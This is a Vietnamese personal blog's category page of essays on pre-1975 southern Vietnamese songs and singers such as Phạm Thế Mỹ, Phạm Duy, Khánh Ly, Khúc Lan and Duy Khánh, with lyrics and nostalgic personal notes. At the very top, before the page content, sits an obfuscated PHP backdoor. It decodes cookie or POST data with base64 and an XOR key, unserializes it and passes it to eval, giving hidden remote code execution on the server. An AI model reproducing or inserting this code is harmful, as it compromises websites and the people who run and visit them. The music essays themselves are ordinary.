$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Việt Nam – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Việt Nam (page 1 of 3)

Trăng tàn trên hè phố & Những ngày xưa thân ái

Hãy nói qua về Phạm Thế Mỹ.

Phạm Thế Mỹ là một trường hợp đặc biệt hiếm hoi trong làng âm nhạc Việt Nam, cả trước và sau 1975. Ông là nhạc sĩ Việt-cộng, nhưng những bài nhạc của ông được các ca sĩ lính-quốc-gia hát nhiều đến mức, nếu không thật sự tìm hiểu kĩ, những bài nhạc đó rất dễ bị lầm tưởng là viết cho Việt Nam Cộng Hoà. Dẫn đến việc, có một số bài của ông rất nổi tiếng được cấp phép chính thức và được hát khắp nơi: “Bông hồng cài áo”, “Hoa vẫn nở trên đường quê hương”…, lại có những bài đến giờ vẫn chưa được cấp phép hát, như: “Trăng tàn trên hè phố”” và “Những ngày xưa thân ái”.

Cả 2 bài “Trăng tàn trên hè phố” và “Những ngày xưa thân ái” xứng được liệt vào danh sách những bài nhạc vàng hay nhất ở miền Nam trước năm 1975. Rất nhiều ca sĩ thành danh ở miền Nam ngày đó, và hải ngoại hiện tại, vẫn trình bày 2 ca khúc này của ông: Duy Khánh, Giang Tử, Tuấn Vũ, sau thì có Băng Tâm, Đan Nguyên, Trường Vũ, Như Quỳnh…

Bài “Trăng tàn trên hè phố” có những câu rất đẹp, mà ắt phải có một tâm hồn tinh tế, yêu quê hương, xúc động với thời cuộc, tác giả mới viết ra được

Lối gầy về nhà anh hoa phượng thắm
Màu xanh áo người thương
Nắng chiều đẹp quê hương
Hay nhạc buồn đêm sương

hay

Ánh trăng khuya sắp tàn trên hè phố
Thôi mình chia tay
Rồi mai đây có về
Quà cho tôi anh nhớ chép bài thơ

Nhưng ở note này, hãy nói chủ yếu về bài “Những ngày xưa thân ái”. Bài này, theo mình, phải nghe Duy Khánh hát mới thấm được thấy cái đẹp và buồn đến tê tái của cảnh chiến tranh bão lửa, những gì còn hoài vọng về, ắt chỉ có kỉ niệm đẹp của những ngày xa xưa êm đềm, đầy thân ái. Đặc biệt, câu

Nghe tin anh gục ngã dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

mỗi lần nghe, đều khiến lòng mình trùng xuống.

Điều đặc biệt, “Những ngày xưa thân ái” nguyên bản là một bài thơ của người anh ruột nhạc sĩ – nhà thơ Phạm Hổ, khi đó đã tập kết ra Bắc. Sau khi Phạm Hổ sáng tác bài thơ đó, thì ở miền Nam, Phạm Thế Mỹ cũng cho ra mắt bài nhạc cùng tên, nhưng ca từ nhân văn và dạt dào tình cảm hơn nhiều, dù nội dung chính đều là về “những ngày xưa”. Thôi, nói tới đây thôi, nói dài quá lại lan man qua chính trị…

Lời bài thơ của Phạm Hổ:

Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Những ngày xưa thân ái
Chắc hắn quên rồi
Riêng tôi, tôi nhớ:
Đồng làng mênh mông biển lúa
Sương mai đáp trắng cỏ đường
Hai đứa tôi,
Sách vở cặp chung
Áo quần nhàu giấc ngủ
Song song bước nhỏ chân trần
Gói cơm mo mẹ vắt xách tùng tơn
Nón rộng hỏng quai
Trong túi hộp diêm nhốt dế
Những ngày xưa êm đẹp thế
Không đem chung hai đứa một ngày mai
Hắn bỏ làng theo giặc mấy năm nay
Tôi buồn tôi giận,
Đêm nay gặp hắn,
Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Xác hắn nằm bờ ruộng
Không phải hắn thuở xưa
Tôi cúi nhìn mặt hắn
Tiếc hắn thời ấu thơ.

Lời bài nhạc cùng tên của Phạm Thế Mỹ:

Những ngày xưa thân ái anh gởi lại cho ai
Gió mùa xuân êm đưa rung hàng cây lưa thưa
Anh cùng tôi bước nhỏ áo quần nhăn giấc ngủ
Đi tìm chim sáo nở ôi bây giờ anh còn nhớ ?

Những ngày xưa thân ái xin gởi lại cho ai
Trăng mùa thu lên cao khóm dừa xanh lao xao
Anh cùng tôi trốn ngủ ra ngồi hiên lá đổ
Trong bầy chim trắng hiền mơ một nàng tiên dịu hiền

Đêm đêm nằm nghe súng nổ giữa rừng khuya thác đổ, anh còn nhắc tên tôi ?
Đêm đêm nhìn trăng sáng tỏ bên đồi hoa trắng nở, cuộc đời anh có vui ?
Thời gian qua mau tìm anh nơi đâu
Tôi về qua xóm nhỏ con đò nay đã già
Nghe tin anh gục ngã
Dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

Những đường xưa phố cũ thôi nỡ đành quên sao
Xin gọi lại tên anh giữa trời sao long lanh
Anh giờ yên giấc ngủ tôi nằm nghe súng nổ
Như lời anh nhắc nhở ôi câm hờn dâng ngập lối
Những ngày xưa thân ái xin buộc vào tương lai
Anh còn gì cho tôi tôi còn gì cho em
Chỉ còn tay súng nhỏ giữa rừng sâu giết thù
Những ngày xưa thân ái xin gởi lại cho em

Note thêm dù chẳng liên quan, là bài “Áo Lụa Vàng”, rất nổi tiếng qua tiếng hát Khánh Ly

Ngày mai em đến, xin mặc áo lụa vàng, nghe em hãy nhớ.
Quê hương anh đó, đang cần đến tình người, đang cần đến nụ cười
Cho tâm hồn nghỉ ngơi

cũng là một bài đầy nhân văn, được nhạc sỹ Phạm Thế Mỹ sáng tác để tặng Hà Thanh, vì có một lần, khi đến thăm ông trên giường bệnh, Hà Thanh mặc trên người một chiếc áo lụa vàng.

p/s: bài Trăng tàn trên hè phố, mình đặc biệt thích version Phương Diễm Hạnh trình bày ở Paris By Night [embedyt] http://www.youtube.com/watch?v=lQtAFSoKf30[/embedyt]

Chỉ chừng đó thôi

Ngày đó Phạm Duy yêu Helene, một cô gái ngoại quốc. Helene sống ở Sài Gòn cùng con gái mình là Alice. Ngày xưa khi còn quen biết và tới nhà Helene, Alice còn bé xíu, thế mà bẵng đi vài chục năm sau gặp lại, Alice đã trở thành một thiếu nữ xinh đẹp. Phạm Duy và Alice phải lòng nhau.

Phạm Duy ngày đó chả vừa, là một người đam mê nhục dục xác thịt (điều này chính ông thừa nhận), nhưng mối tình với Alice là mối tình ông gọi là “mối tình đồng trinh duy nhất” – cả hai chỉ yêu nhau qua tâm hồn, không có bất cứ liên hệ gì về thể xác. Đây có thể xem là một trong những mối tình thơ nhạc đẹp nhất của nền văn học nghệ thuật miền Nam trước giải phóng. Trong rất nhiều bài nhạc của mình, Phạm Duy đều có đề tặng Lệ Lan, sau này mọi người mới biết đó là tên Việt của Alice. Alice cũng viết tặng Phạm Duy tới gần 300 bài thơ, rất nhiều trong đó được ông phổ nhạc.

Trước khi đi lấy chồng, Lệ Lan đã gửi cho nhạc sỹ Phạm Duy một bức thư. Trong đó bà viết: “Mười năm, quá đủ cho một mối tình đẹp và một đời người ngắn ngủi…(…)…Từ đây đến ngày cưới có thể L. sẽ xin gặp chú một, hai lần nữa. Chẳng để làm gì cả. L. chắc chú cũng nghĩ như L. Chẳng có gì bi thảm. Chẳng có gì tiếc hận. Một mối tình đẹp kết thúc một cách êm ái. L. chỉ xin giữ lại một chút dư hương để truyền lại cho các con của L. sau này cho chúng nó cũng có một tâm hồn biết yêu thương đằm thắm”.

Như Phạm Duy sau này về già hồi tưởng, thì có tới hơn 40 bài nhạc của ông lấy Lệ Lan làm cảm hứng, trong đó tiêu biểu nhất là 3 bài:
– Ngày ấy chúng mình – đánh dấu thời điểm yêu nhau
– Nghìn trùng xa cách – đánh dấu thời điểm xa nhau
– Chỉ chừng ấy thôi – đánh dấu thời điểm ông quyết định quên Lệ Lan

—————–

À, sẵn tiện đang nghe “Chỉ Chừng Ấy Thôi” nên viết,

Chỉ cần một cơn mưa
Là vai gầy thêm nữa
Cho ướt môi, mềm da
Chỉ cần giọt mưa sa

Chỉ chờ một cơn mưa
Để không ngờ chi nữa
Đi dưới mưa hồng nghe
Giọt nhẹ vào tim ta.

For M, M sống tốt nhé.

buổi trưa

Hôm nay là ngày bốn năm một lần, như người ta hay gọi, anh nghĩ rất nhiều thứ. Em biết không, cuối tuần thường là thời gian anh buồn nhất, vì đó là những ngày duy nhất anh ngủ trưa. Anh ít nghĩ nhiều trước khi anh ngủ mỗi tối, vì thường những công việc trong ngày vắt kiệt sức của anh, anh chỉ leo lên giường, nghe nhạc và nhắm mắt lại, ngủ rất nhanh.

Thế nhưng, những buổi trưa cuối tuần, anh nằm trên giường, mệt nhọc, nhìn ra cửa sổ bên ngoài nắng chói chang, tim anh thắt lại khi nghĩ về nhiều thứ. Những buổi trưa nắng và uể oải luôn gợi anh nhớ đến rất nhiều thứ, anh biết anh chưa từng quên, nhưng không phải luôn nhớ về.

Đó là những trưa cấp 1 tan học nắng chói trên đầu, đi bộ trên con đường đất về nhà. Ngày đó còn nhỏ, đường sao mà xa xôi và mệt nhọc thế?
Đó là những buổi trưa lớp 7, lớp 8, bà nội anh trưa nào cũng làm cho ăn một cái đùi gà chiên bơ thơm nức, anh vừa ăn vừa nuối tiếc vì phải bỏ nửa chừng tập phim chiếu lúc 12 giờ (anh còn nhớ đó là Thanh Cung Mười Ba Hoàng Triều), để đạp xe cọc cạch đến trường.
Đó là những buổi trưa lớp 12, anh ở lại trường học thi đại học, cả bọn đi vòng vòng tìm lớp học nào trống, kê bàn kê ghế lại rồi ngủ trưa, giấc ngủ ngắn mệt nhoài.

Đó dù là những ngày trưa ở Việt Nam đầy ngây thơ, trẻ trung, hay là những trưa của buổi đầu sang nước Mỹ, lo sợ và mất định hướng, cứ nằm buổi trưa nghĩ là anh thấy mệt nhoài. Cứ có thứ gì rất nặng trong tim anh, khó giải thích, anh nghĩ là vì anh tiếc hay anh nhớ một anh của thuở xa xưa đấy.

Chính những kí ức vụn vặt thế về ngày xưa, về anh một thuở, về những khuôn mặt nửa lạ lửa quen, cứ như một vòng tròn thắt chặt trái tim anh. Anh đang mất định hướng hay anh đang băn khoăn? Anh đang nhớ, đang buồn hay đang hồi vọng? Anh không còn có thể trả lời được rồi…

-H

Khánh Ly – Lullaby of Đà Nẵng

“Lullaby Of Đà Nẵng” là tên đĩa nhạc được Khánh Ly thu vào năm 1987 tại Nhật với hãng đĩa Nippon Columbia rất lớn thời điểm đó. Đây cũng là bài hát chủ đề trong bộ phim “Thuyền Nhân” do Nhật Bản – Hồng Kông sản xuất từng gây tiếng vang không nhỏ.

Mình nghe Khánh Ly, chắc là nhiều lắm, nhưng chưa bao giờ nghe tới bài này, cho tới khi tìm được và vất vả đấu giá thắng đĩa trên eBay. Trong khoảng thời gian chờ đĩa ship từ Nhật qua, mình luôn có thắc mắc là “Lullaby of Đà Nẵng” dịch là “Lời ru của Đà Nẵng” (dành cho những người con đã bỏ ra đi), hay là “Lời ru cho Đà Nẵng” (lời của những người con dành cho đất mẹ mình đã bỏ lại). Mình nghĩ là cho.

Câu chuyện “thuyền nhân” là những câu chuyện dài và rất khó kể hết. Những lần hội họp gia đình, đa phần mình đều được nghe các cậu, các dì, hay là cả mẹ mình kể về những ngày trở thành thuyền-nhân đó. Những câu chuyện đôi khi xen chút bông đùa, tưởng như nhẹ nhàng, nhưng sức nặng và dấu ấn mà nó để lại, với đời mẹ mình chưa phai, và tới mình, dù không trải qua cũng lại hằn in không bớt.

Tối nay, khi đĩa về, tự mình pha cho mình một li Tequila (mình rất hiếm uống một mình), chui vào phòng, tắt đèn và bỏ đĩa vào mâm. Ngay khi tiếng cô Khánh Ly vang lên từ những giây đầu bài, tim mình đã trĩu nặng, li rượu trên tay đột nhiên thành đắng nghét. Cũng không ngờ, một bài nhạc trong thời điểm này lại khiến mình xúc động nhiều như thế

Nước mắt rơi xuống thân phận người
Khóc giấc mơ đã tan tành rồi
Em yêu hỡi! xa muôn đời
Còn đâu nữa quê hương tuyệt vời…

Khi Khánh Ly kết thúc bài hát bằng 4 câu đó, mình nhìn ra ngoài bầu trời đêm đen thăm thẳm thấy nhớ, nhớ tất cả mọi thứ ở Việt Nam, nhớ gì đâu…

p/s: đĩa còn rất mới, cả 2 bài đều là nhạc của Hako Yamasaki. Bài mặt 1 là “Lullaby of Đà Nẵng”, lời do Nguyễn Hoàng Đoan – chồng cũ Khánh Ly soạn. Bài mặt 2 là “Sao hôm nay”. Điều lạ là khi chơi đĩa ở tốc độ 45 vòng thì là tiếng hát Khánh Ly, khi để đĩa sang chế độ chơi bình thường 33 vòng thì là tiếng của một ca sĩ nam nào đó…

Khúc Lan

Lớp trẻ ngày nay nghe nhạc Hàn và nhạc Âu Mỹ nhiều, chứ mình nhớ lứa bọn mình hồi còn cấp 2, chắc tuyền chỉ nghe nhạc Hoa lời Việt. Nhạc Hoa lời Việt có giai điệu chậm buồn dễ đi vào lòng người, và lời thì ôi thôi sướt mướt ủy mị chia cách phân đôi rất hợp với lứa thanh niên mới lớn học yêu và thất tình.

Nhạc Hoa lời Việt ngày đó và cho cả đến bây giờ vẫn hay bị gán cho cái tiếng khá xấu như là loại nhạc sến rẻ tiền. Những ca sĩ bắt đầu sự nghiệp và đi lên nhờ nhạc Hoa thì vẫn được nhắc đến, như Lam Trường, Minh Thuận, Jimmy Nguyễn… nhưng những nhạc sĩ đã có công chuyển lời các ca khúc lời Hoa sang tiếng Việt thì hay bị lãng quên.

Như cũng nói về việc chuyển ngữ, Phạm Duy, Lữ Liên, Nhật Ngân được đánh giá cao nhất, vì họ chuyển ngữ những ca khúc Pháp rất quí tộc; kế đó là Vũ Xuân Hùng – tuy nhiên ông cũng được đánh giá cao với biệt danh ‘ông vua chuyển ngữ’ ca khúc; và còn 1 tên tuổi nữa hay bị coi nhẹ, mà ở đây mình xin nhắc đến: Khúc Lan.

Hầu như những tên tuổi hát nhạc Hoa ở Việt Nam đều từng hát một bài nào đó lời Việt: Khúc Lan, từ Tô Chấn Phong, Anh Tú, Tú Quyên, đến sau này là Lưu Bích, Lam Trường… Khúc Lan dịch lời không hoa mỹ như Phạm Duy, không trau chuốt như Lữ Liên, nhưng nghe rất buồn và rất thật – thật như chính nhạc sĩ là người trong cuộc đang hát liên tiếng lòng của mình.

Thử kể ra ở đây vài bài trong vô vàn những bài nổi tiếng mà Khúc Lan đã dịch ra tiếng Việt: Hoài Mong (bài này Anh Tú hát còn hay hơn cả Trương Học Hữu), Sa mạc tình yêu (bài này kinh điển), Tình em ngọn nến (bài này Mỹ Tâm hát nổi tiếng), Tàn tro (Thanh Hà), Dĩ vãng nhạt nhòa (Lưu Bích & Tô Chấn Phong)… lời dịch trong các bài của Khúc Lan nghe cũng dễ cảm:

Từng giọt lệ mờ trong sương. Chờ ai cơn mộng xưa đã phai mờ. Từ khi em qua chốn này. Những ân tình hay có anh đợi mong

hay

Ngày đôi ta xa nhau. Có những cơn mưa nhẹ bay. Tình như cơn mộng say. Đã chia ly từ đây. Tình người ơi sao tha thiết. Có em luôn chờ mong. Hãy cho em vơi đi những nụ cười. Để những ngày vui

hay

Giọt sương ban sớm lấp lánh trên hoa, nụ hoa Anh đào . Đời người con gái chỉ biết khi yêu, yêu nồng thắm… Thì tại sao thèm nước mắt cho đớn đau nỗi hận sầu.. Em chỉ biết có mỗi mình anh thôi cho dù anh trót đắm say với ai em vẫn yêu, vẫn đợi chờ..

—-

Tự nhiên ngồi nghe một loạt ca khúc của Khúc Lan chuyển lời, lại nhớ tới thi sĩ Phạm Công Thiện từng nói:

Tâm hồn của Khúc Lan có một cái gì khác thường và một cái gì bảng lảng nhất mà tôi vẫn chưa thể xác định được trong ngôn ngữ thường hiện nay

http://www.youtube.com/watch?v=l-EIP0ZijgQ.

Duy Khánh – người lính già xa quê hương

Đã từ lâu lắm, tôi muốn viết gì về nhạc vàng; không dưới góc nhìn của những ‘chứng-nhân-lịch-sử’, những con người sinh ra, lớn lên và trưởng thành, yêu, chia tay, nhớ thương và ghét hận cùng với những lời ca, giai điệu ấy, mà bằng góc nhìn của một người trẻ chào đời khi đất nước không còn trong cơn binh loạn, chỉ biết đến dòng nhạc ấy qua những băng, đĩa, tài liệu còn sót lại.

Tôi không hẳn là say mê nhạc vàng như cách mà tôi say mê các dòng nhạc khác, nhưng những giai điệu quen thuộc của nhạc vàng đã đi cùng tôi, từ khi tôi còn nhỏ xíu, nghe bập bõm tiếng được tiếng mất những câu ca, tiếng nhạc ấy từ chiếc cát-xét cũ kĩ cùng mớ đĩa thu lậu của ba. Dù biết còn nhiều thiếu sót, nhưng tôi cũng xin gắng viết bài gì đó về nhạc vàng, để tri ân những nhạc sĩ, ca sĩ, những người đã cống hiến cả đời cho nền âm nhạc quê hương, và cũng để trả nợ những hồi ức đẹp đẽ vẫn đã, đang và sẽ mãi đi cùng tôi.

Trong các ca sĩ nhạc vàng, tôi mê nhất là Duy Khánh. Thật ra, Duy Khánh không phải là ca sĩ nhạc vàng tôi nghe đầu tiên. Các đĩa nhạc phổ biến ở miền Nam những năm 90 là của Tuấn Vũ, Trường Vũ, Randy… những giọng ca được ưa chuộng vào lúc đó. Sau này, khi tôi được coi là tạm lớn để hiểu chút-gì-đó – thứ mà sách giáo khoa nhà trường, thầy cô giáo chưa bao giờ dạy tôi – về nỗi buồn đau đáu của người xa quê cha đất mẹ, về nỗi buồn của sự phân ly vì thời cuộc, của mẹ già tiễn con, vợ trẻ chờ chồng… và có chút kiến thức để tìm kiếm, để đọc và hiểu, tôi mới nghe và cảm được Duy Khánh.

Duy Khánh được xem như một trong những ca nhạc sĩ tài hoa bậc nhất của nền tân nhạc Việt Nam trong thập niên 60. Người ta vẫn có tâm lý xem thường giọng hát của các ca sĩ nhạc vàng, vì cho rằng nhạc vàng là thứ nhạc dễ hát. Điều này là hoàn toàn sai lầm. Lấy trường hợp của Duy Khánh làm điển hình. Ngày đó, ở Sài Gòn các ca sĩ hát được giọng Ténor khá hiếm, giọng Ténor của Duy Khánh còn đặc biệt bởi độ ngân vượt quá sự tưởng tượng của mọi người. Theo lời kể lại của các nhạc sĩ danh tiếng như Phạm Duy, Trầm Tử Thiêng thì giọng của Duy Khánh có thể ngân dài đến 21 nhịp và chuyển từ thấp lên cao, vượt hai bát độ một cách nhẹ nhàng. Lại lấy thêm bản Vọng Ngày Xanh của Khánh Băng làm ví dụ, bản này vốn được xem là rất khó hát ngày đó (ngoài lề xíu, bản này đã được nữ văn sĩ Françoise Sagan viết lại lời bằng tiếng Pháp). Vọng Ngày Xanh nổi tiếng nhất qua tiếng hát cao vút của Thái Thanh. Các giọng nam thì cũng chỉ có Hùng Cường và Thanh Hùng (cũng là hai giọng Ténor khác) và Duy Khánh mới ‘dám’ trình bày. Nghe kể lại, Duy Khánh có lần trình bày bản “Vọng Ngày Xanh” đã ngân đoạn kết lâu đến nỗi khán giả vỗ tay tán thưởng đến lần thứ tư mà tiếng ngân của ông vẫn còn nhẹ nhàng, dần dần mới đi vào tan biến.

Duy Khánh – tiếng thông reo trên đồi Vọng Cảnh

Trong ngày tiễn đưa Duy Khánh đi về phía bên kia của thế giới, nhạc sĩ Phạm Duy từng phát biểu “Trong giọng ca Duy Khánh, nghe âm hưởng tiếng trống cổ thành, tiếng thông reo trên đồi Vọng Cảnh”. Quả thật, có thể xem Duy Khánh như là ca nhạc sĩ của miền quê sông Hương núi Ngự, của miền Trung nghèo khổ, khó khăn. Vài chục năm đi hát, từ ngày đầu vào miền Nam lập nghiệp, đi lưu diễn cùng các đoàn nhạc hội của Hoàng Thi Thơ khắp các tỉnh miền Tây, cho đến sau này trình diễn ở hải ngoại, Duy Khánh vẫn luôn dùng giọng nói đặc rệt Quảng Trị, dù khó nghe. Bản thân ông chưa từng chối bỏ xuất thân, trái lại còn yêu thương quê hương với một tình yêu đầy hãnh diện. Hãy thử nghe ông trong một nhạc phẩm do chính ông sáng tác: “Tôi sinh ra giữa lòng miền Trung, miền thùy dương, ruộng hoang nước mặn đồng chua, thôn xóm tôi sống đời dân cày” (Tình Ca Quê Hương).

Nhắc lại cái thưở ban đầu Duy Khánh đi hát mới thấy gian nan quá. Sinh ra trong một gia đình thế gia vọng tộc (dòng dõi Quận công Nguyễn Văn Tường, Phụ chánh đại thần triều Nguyễn), cha mẹ kì vọng vào ông rất nhiều để sau này nối dõi truyền thống dòng quan của gia đình. Duy Khánh được cha mẹ gởi vào Huế để học tiếp bậc trung học. Tuy nhiên, chàng trai trẻ vào thời điểm này lại hứng thú với việc ca hát hơn. Ngay từ năm 1954, lúc tuổi 16, Duy Khánh từng nhiều lần trốn vào Sài Gòn tham gia các chương trình phụ diễn tân nhạc trong các rạp chiếu bóng. Ông hát song ca với nữ ca sĩ Tuyết Mai những bài ca rất đậm tình quê hương. Năm 1955, Duy Khánh trở lại Huế và đã đoạt giải nhất cuộc thi tuyển lựa ca sĩ của đài Pháp Á tại Huế với bài hát Trăng Thanh Bình.

Năm 1956, trước sự phản đối của gia đình, Duy Khánh quyết định chuyển hẳn vào Sài Gòn để theo đuổi nghiệp ca hát. Khi này, nhạc sĩ Phạm Duy đã đích thân mời Duy Khánh tham gia vào chương trình Hoa Xuân. Không lâu sau đó, Duy Khánh dần trở thành một trong những tên tuổi được yêu thích nhất tại miền Nam thời đó, đứng ngang với hai tên tuổi nổi tiếng bậc nhất là nam ca sĩ Anh Ngọc và Duy Trác. Tuy nhiên, vẫn có những người xem sự so sánh đó là quá mức, với lí luận rằng Duy Khánh thành công thế không hoàn toàn nhờ vào giọng hát. Quả thật, Duy Khánh nổi bật cũng một phần vì ông biết chọn những bài thời thượng, hợp với thị hiếu của khán thính giả bình dân, chứ không theo đuổi dòng nhạc trữ tình có chút gì đó kén chọn như Duy Trác, Anh Ngọc. Phải đến sau này, khi Duy Khánh kết hợp cùng Thái Thanh trình bày hai bản Trường Ca của Phạm Duy là: Con Đường Cái Quan và Mẹ Việt Nam, người ta mới có cái nhìn khác về giọng hát của nam ca sĩ tài hoa này. Và cho đến giờ, vẫn chưa từng ai trình bày hai bản trường ca đó đạt đến cái tầm của Duy Khánh và Thái Thanh.

Ngoài ra, như trong một bài viết khác, tôi cũng đã nhắc đến Hòn Vọng Phu. Nay xin nhắc lại vài ý liên quan đến Duy Khánh, ấy là:

Bản thu của Duy Khánh và Hoàng Oanh trên đĩa nhựa Sóng Nhạc 45 được chính nhạc sĩ Lê Thương điều khiển phần hòa âm, hội tụ những nghệ sĩ nổi danh thời bấy giờ như: đàn cò Lữ Liên, sáo Tô Kiều Ngân, đàn bầu Ngô Nhật Thanh… Bản này có giọng ngâm thơ của Hoàng Oanh – người được đánh giá là “đủ tài ca ngâm”, một trong những giọng ngâm thơ hay nhất trong nền nhạc Việt Nam. Bản này xét ra, về phần nghệ thuật có thể không hay bằng các bản thu ở trên, nhưng độc đáo ở chỗ: phần Hòn Vọng Phu III được trình bày bằng lời hai. 

…và những tác phẩm bị đặt nhầm

Duy Khánh là một con người đa tài. Ngoài việc ca hát, ông còn mở lớp luyện ca để tìm kiếm, phát hiện và đào tạo các ca sĩ mới, đồng thời tham gia sản xuất băng nhạc. Nhãn hiệu băng nhạc Trường Sơn của Duy Khánh, cùng với những cái tên như Shotguns, Sơn Ca, Sóng Nhạc, Nhã Ca… trước năm 1975 được người Sài Gòn nồng nhiệt đón nhận. Hợp tác với Duy Khánh trong băng nhạc Trường Sơn là những tên tuổi thượng thặng như Thái Thanh, Hoài Bắc, Thanh Thúy, cùng những ca sĩ rất nổi thời đó như Hoàng Oanh, Thanh Tuyền, Phương Dung.

Tuy nhiên, ngoài hình ảnh một ca sĩ đầy tài năng và nhiệt huyết dưới ánh đèn sân khấu, Duy Khánh được yêu quý nhất có lẽ là bởi những sáng tác của ông. So với các nhạc sĩ khác, sáng tác của Duy Khánh không nhiều, nhưng hầu như bài nào cũng đều rất đạt; có những bài xứng được liệt vào hàng tuyệt phẩm. Khi nói về Duy Khánh, Phạm Duy từng nhận định: Duy Khánh là nhạc sĩ của quê hương. Quả thật, Duy Khánh chủ yếu viết về tình yêu quê hương, đất nước, về miền Trung gian khó, cằn cội, về xứ Huế thần kinh đẹp lãng mạn nhưng buồn vô ngần.

Một trong những sản phẩm đáng nhắc đến của Duy Khánh là bản “Bao giờ em quên”. Nhiều người xem đây là bài hát buồn nhất mà Duy Khánh từng sáng tác, xuất phát từ việc người ông yêu: Kiều Oanh, em gái của tay trống Linh Giang, một thiếu nữ đẹp dịu dàng, nói giọng Bắc rất ngọt ngào, bỏ đi lấy chồng.

Hương Giang thuyền không chỗ đậu 
Ngự Viên có bướm hoa vàng 
Hay là hài xưa yêu dấu 
Đưa người đẹp ấy sang ngang 

Trước năm 1975, Bao Giờ Em Quên gắn liền với “tiếng hát Liêu Trai” Thanh Thúy. Trùng hợp thay, sau khi Thanh Thúy trình bày thành công bản này, Duy Khánh cũng công khai theo đuổi Thanh Thúy, nhưng không nghe ai nói gì đến kết quả ra sao.

Ngoài bài “Bao Giờ Em Quên”, Duy Khánh còn những sác tác khác cũng rất được đón nhận như: Thương về miền Trung, Ai ra xứ Huế, Thư về em gái Thành Đô, Trường cũ tình xưa, Sầu cố đô, Xin anh giữ trọn tình quê, Ngày xưa lên năm lên ba (viết chung với Trầm Tử Thiêng)…

Tuy nhiên, điều đáng buồn ở đây là sau năm 1975, vì để được trình bày vài nhạc phẩm của Duy Khánh trên sân khấu, người ta đã làm cái việc đổi tên tác giả ca khúc mà không hỏi qua ông. Như bài Thương về miền Trung và Ai ra xứ Huế đều được đổi thành tác giả: Minh Kỳ. Và ngạc nhiên thay, sau này, mọi người dần quen với cái tên tác giả Minh Kỳ, cũng không ai đứng ra đính chính. Cho đến nay, đa phần mọi người vẫn không biết rằng hai tác phẩm dạt dào tình cảm quê hương ấy là của Duy Khánh.

…thầm hẹn ngày về chết giữa quê hương

Sau năm 1975, vì nhiều lí do nhưng chủ yếu liên quan đến chính trị, Duy Khánh bị cấm hát một thời gian dài. Mãi sau này khi các đoàn ca nhạc được chính quyền nới lỏng cho hoạt động trở lại, Duy Khánh mới thành lập đoàn Quê Hương, quy tụ nhiều nghệ sĩ tài danh miền Nam trước năm 1975, tổ chức các buổi lưu diễn khá thành công.

Năm 1988, ông ra nước ngoài định cư qua sự bảo lãnh của người em. Qua đến Hoa Kỳ, ông vẫn tham gia các chương trình văn nghệ, chủ yếu để kiếm kế sinh nhai. Tuy nhiên, ông đã không còn có thể tìm lại hình ảnh của một nam danh ca Duy Khánh hào hoa, lịch lãm trong những năm thập kỷ 60. Những dấu vết khắc khổ của thời gian đã in hằn lên khuôn mặt rạng sáng năm nào, giọng hát thiên phú một thời nay bị tàn phá bởi những giọt rượu chán đời.

Đối với một người yêu quê hương bằng tất cả tấm lòng như Duy Khánh, còn gì buồn khổ hơn việc phải sống tha phương trên xứ lạ, quê người, ngày đêm nhớ về đất mẹ? Người ta bảo: trong cuộc đời nghệ thuật của mình, một ca sĩ có thể hát hàng trăm, hàng ngàn bài cho khán giả, nhưng trong đó, vẫn có đôi ba bài, họ hát tặng riêng chính bản thân mình.

Với Duy Khánh, theo tôi, đó là khi ông trình bày bài Xin Anh Giữ Trọn Tình Quê, và bàiNgười Lính Già Xa Quê Hương. Trong Xin Anh Giữ Trọn Tình Quê – một sáng tác của chính Duy Khánh, tôi còn nhớ cái video clip tôi được xem hồi khá lâu rồi, trên sân khấu bóng đèn nhấp nhoáng hoa lệ, khi Duy Khánh ca tới những câu cuối cùng của bản này, ông đưa tay vẫy lên như đang gởi lời chào tới một người bạn, và khóe miệng ông khẽ mỉm cười..

Anh ơi cho dù anh trở về quê hương hoặc còn tha phương 
Xin anh còn giữ vẹn câu thề 
Dù gió mưa về vẫn một lòng yêu mến quê 
Ngày mai ta xa nhau rồi nhưng tin trong đời anh sẽ còn gặp tôi 
Quê cũ mừng vui 

Còn trong Người Lính Già Xa Quê Hương, đó là những tâm sự, những giọt nước mắt nghẹn ngào phải nuốt ngược vào trong, khi ông, trong hình ảnh một người lính già, ngồi buồn và nhớ đến quê hương, thương cho cái kiếp lưu vong của mình

Người lính già xa quê hương 
Bao nhiêu đêm anh nằm không ngủ 
Nhớ quá Mẹ hiền, nhớ quá anh em 

Vẫn thấy quê hương đêm ngày réo gọi 
Vẫn thấy trong tim canh cánh đường về 
Vẫn thấy nơi đây chỉ là đất tạm 
Thầm hẹn ngày về chết giữa quê hương

Tiếc cho ông, khi cái ước hẹn đó không thể thực hiện được. Thậm chí, ông không còn có thể quay về nhìn quê hương một lần kể từ khi mang kiếp sống lưu vong.

